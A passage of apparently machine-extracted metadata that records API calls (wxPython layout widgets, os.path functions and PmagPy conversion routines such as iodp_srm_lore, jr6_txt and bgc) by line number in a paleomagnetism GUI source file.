1830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1835, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1845, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1845, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1857, "usage_type": "call"}, {"api_name": "wx.BusyInfo", "line_number": 1858, "usage_type": "call"}, {"api_name": "wx.SafeYield", "line_number": 1859, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 1862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1862, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1868, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1868, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_samples_csv", "line_number": 1892, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1892, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1897, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1897, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1901, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1901, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 1908, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1908, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1908, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1909, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1909, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1911, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1911, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1917, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1917, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1926, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1926, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1933, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1933, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1935, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1935, "usage_type": "name"}, {"api_name": "wx.BLACK", "line_number": 1946, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1949, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1960, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1963, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1968, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1971, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1979, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1979, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1985, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1985, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1987, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1987, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1987, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1987, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1989, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1989, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1989, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1989, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1991, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1991, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1991, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1991, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2002, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2002, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2003, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2003, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 2006, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2006, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2010, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2010, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2015, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2015, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2020, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2020, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2025, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2025, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2028, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2031, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2031, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2036, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2036, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2039, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2039, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2042, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2042, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2054, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2057, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2057, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2070, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 2076, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2083, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2083, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2129, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2131, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2131, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2134, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2134, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2141, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2141, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2141, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2141, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2144, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2150, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2151, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2159, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2159, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2160, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2160, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_yes_or_no", "line_number": 2166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2166, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2169, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2169, "usage_type": "name"}, {"api_name": "wx.EVT_CHECKBOX", "line_number": 2170, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2173, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2173, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2177, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2177, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2181, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2181, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2186, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2186, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2190, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2190, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2193, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2193, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2196, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2196, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2200, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2200, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2204, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2204, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2207, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2207, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2210, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2210, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2213, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2213, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2216, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2216, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2217, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2217, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2222, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2222, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2235, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2236, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2239, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2239, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2275, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2275, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2279, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2292, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2294, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2294, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2297, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2299, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2299, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2301, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2301, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2303, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2303, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2305, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2305, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2334, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2343, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2343, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2349, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2349, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2352, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2352, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_txt", "line_number": 2361, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2361, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2364, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2366, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2366, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_jr6", "line_number": 2368, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2368, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2371, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2373, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6", "line_number": 2377, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2377, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2380, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2380, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2382, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2396, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2396, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic.do_help", "line_number": 2396, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic", "line_number": 2396, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2398, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2398, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic.do_help", "line_number": 2398, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic", "line_number": 2398, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2401, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2407, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2408, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2417, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2417, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2418, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2418, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2421, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2421, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2424, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2424, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2427, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2427, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2430, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2430, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2434, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2434, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2438, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2438, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2442, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2445, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2445, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2449, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2449, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2453, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2453, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2457, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2457, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2468, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2468, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2472, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2475, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2475, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2489, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2489, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2492, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 2497, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2497, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2538, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2538, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2547, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2562, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2562, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2569, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2569, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2572, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2572, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2574, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2574, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2581, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2581, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2581, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2581, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2599, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2599, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2600, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2600, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2606, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2606, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2609, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2609, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2613, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2613, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2617, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2617, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2620, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2620, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 2623, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2623, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2627, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2627, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2630, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2630, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2634, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2634, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2637, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2637, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2647, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2647, "usage_type": 